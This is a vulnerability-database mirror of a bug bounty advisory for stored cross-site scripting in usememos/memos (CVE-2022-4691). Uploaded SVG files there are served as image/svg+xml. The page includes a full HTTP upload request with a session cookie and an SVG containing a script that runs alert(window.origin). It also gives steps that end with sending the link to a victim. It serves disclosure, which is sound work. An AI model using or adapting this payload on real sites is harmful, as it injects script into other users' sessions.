Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
huntrJuylang459B55C1-22F5-4556-9CDA-9B86AA91582F
HistoryDec 20, 2022 - 11:32 a.m.

Cross-site scripting - Stored via upload `.svg` file in

2022-12-2011:32:15
juylang
www.huntr.dev
46
cross-site scripting
stored file upload
image format handling
security vulnerability
proof of concept
file upload interaction
content-type header
svg file
web security
bug bounty program

0.001 Low

EPSS

Percentile

20.3%

JSON

Description

When user upload a file with .svg extension and direct access this file, the server response with Content-type: image/svg+xml lead to processing SVG as HTML file

Proof of Concept

POST /api/resource HTTP/2
Host: demo.usememos.com
Cookie: memos_session=MTY3MTUzMjkzMXxEdi1EQkFFQ180UUFBUkFCRUFBQUhfLUVBQUVHYzNSeWFXNW5EQWtBQjNWelpYSXRhV1FEYVc1MEJBTUFfOG89fDYqserGzpcgkE9G0qSf_dQ9Q8rHAMeM_lb9V-vZecyd
Content-Length: 462
Sec-Ch-Ua: "Not?A_Brand";v="8", "Chromium";v="108"
Accept: application/json, text/plain, */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFu7Yl3xXBKej60Xw
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://demo.usememos.com
Referer: https://demo.usememos.com/?text=1&shortcutId=1
Accept-Encoding: gzip, deflate

------WebKitFormBoundaryFu7Yl3xXBKej60Xw
Content-Disposition: form-data; name="file"; filename="xss.svg"
Content-Type: image/svg+xml

<svg width="100%" height="100%" viewBox="0 0 100 100"
     xmlns="http://www.w3.org/2000/svg">
  <circle cx="50" cy="50" r="45" fill="green"
          id="foo"/>
  <script type="text/javascript">
    // <![CDATA[
      alert(window.origin);
   // ]]>
  </script>
</svg>
------WebKitFormBoundaryFu7Yl3xXBKej60Xw--

Step to reproduce

  1. Prepare a file xss.svg with content: <script type=“text/javascript”>// <![CDATA[alert(window.origin);// ]]></script>
  2. Upload xss.svg file in Resource library -> Upload
  3. Coppy Link file XSS send to victim

Related

github 1
cve 1
veracode 1
prion 1
osv 2
nvd 1
cvelist 1
github
github
usememos/memos vulnerable to stored Cross-site Scripting
2022-12-27 15:30:19
cve
cve
CVE-2022-4691
2022-12-27 15:15:11
veracode
veracode
Cross-site Scripting (XSS)
2023-01-03 08:47:56
prion
prion
Cross site scripting
2022-12-27 15:15:00
osv
osv
usememos/memos vulnerable to stored Cross-site Scripting
2022-12-27 15:30:19
CVE-2022-4691
2022-12-27 15:15:11
nvd
nvd
CVE-2022-4691
2022-12-27 15:15:11
cvelist
cvelist
CVE-2022-4691 Cross-site Scripting (XSS) - Stored in usememos/memos
2022-12-23 00:00:00

0.001 Low

EPSS

Percentile

20.3%

JSON
Related for 459B55C1-22F5-4556-9CDA-9B86AA91582F
github1cve1veracode1prion1osv2nvd1cvelist1